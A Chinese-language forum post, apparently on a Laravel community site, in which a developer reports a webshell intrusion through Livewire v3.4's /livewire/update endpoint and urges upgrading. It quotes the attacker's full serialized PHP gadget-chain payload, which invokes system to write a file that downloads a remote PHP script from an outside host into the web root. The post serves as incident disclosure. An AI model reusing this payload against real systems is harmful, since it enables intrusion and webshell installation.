"livewire/livewire": "^3.4" 这个版本有漏洞,要快速处理

一个没啥用的老项目,阿里云发信息给我已被webshell

版本为 :
“laravel/framework”: “10”,
livewire v3.4.10

  • 攻击者构造了 Illuminate\Broadcasting\BroadcastEvent(Laravel 框架的广播事件类)的序列化对象,这是 Laravel 框架的核心类,通常会被框架自动反序列化处理;
  • 序列化字符串中嵌套了 PendingBroadcast/Validator 等 Laravel 内置类,目的是绕过框架的反序列化过滤(利用框架自身类的属性可控性);
  • 关键是将恶意命令写入 PendingBroadcast 类的 *event 属性中,当框架反序列化这个对象并执行 handle/__destruct 等魔术方法时,会触发该属性的内容执行。

入侵入口是:

/livewire/update

post内容:

chained:O:38:"Illuminate\Broadcasting\BroadcastEvent":4:{s:5:"dummy";O:40:"Illuminate\Broadcasting\PendingBroadcast":2:{s:9:"*events";O:31:"Illuminate\Validation\Validator":1:{s:10:"extensions";a:1:{s:0:"";s:6:"system";}}s:8:"*event";s:371:"echo ‘ <?php $url = ‘https://kontoolodon.live/m4ke-0v3r.txt‘; $file = ‘/var/www/html/0v3r.php‘; file_put_contents($file, file_get_contents($url)); echo "Downloaded: " . (file_exists($file) ?YES:NO); ?>> /tmp/download.php";}s:10:"connection";N;s:5:"queue";N;s:5:"event";O:37:"Illuminate\Notifications\Notification":0:{}}

会在根目录出现两个木马

“livewire/livewire”: “^3.4” 这个版本如果有线上运行的,马上升级或做权限安全处理

现在AI盛行,攻击者可以直接让ai去查看开源软件那里有漏洞,直接让ai写注入木马

应对:

  1. 加入防火墙
  2. 项目防篡改权限
  3. 升级框架
  4. 庆幸是没啥用的项目
本作品采用《CC 协议》,转载必须注明作者和本文链接
《L02 从零构建论坛系统》
以构建论坛项目 LaraBBS 为线索,展开对 Laravel 框架的全面学习。应用程序架构思路贴近 Laravel 框架的设计哲学。
《G01 Go 实战入门》
从零开始带你一步步开发一个 Go 博客项目,让你在最短的时间内学会使用 Go 进行编码。项目结构很大程度上参考了 Laravel。
讨论数量: 2

养成定期 composer audit 的好习惯,这个去年 7 月份就已经修复了,这都已经半年了。

1周前 评论

我中招了,网站目录被删完了,还好文件都在云,数据库他也删不了。就是这个Livewire Update的漏洞

1周前 评论

讨论应以学习和精进为目的。请勿发布不友善或者负能量的内容,与人为善,比聪明更重要!
未填写
文章
39
粉丝
16
喜欢
146
收藏
135
排名:311
访问:3.0 万
私信
所有博文
社区赞助商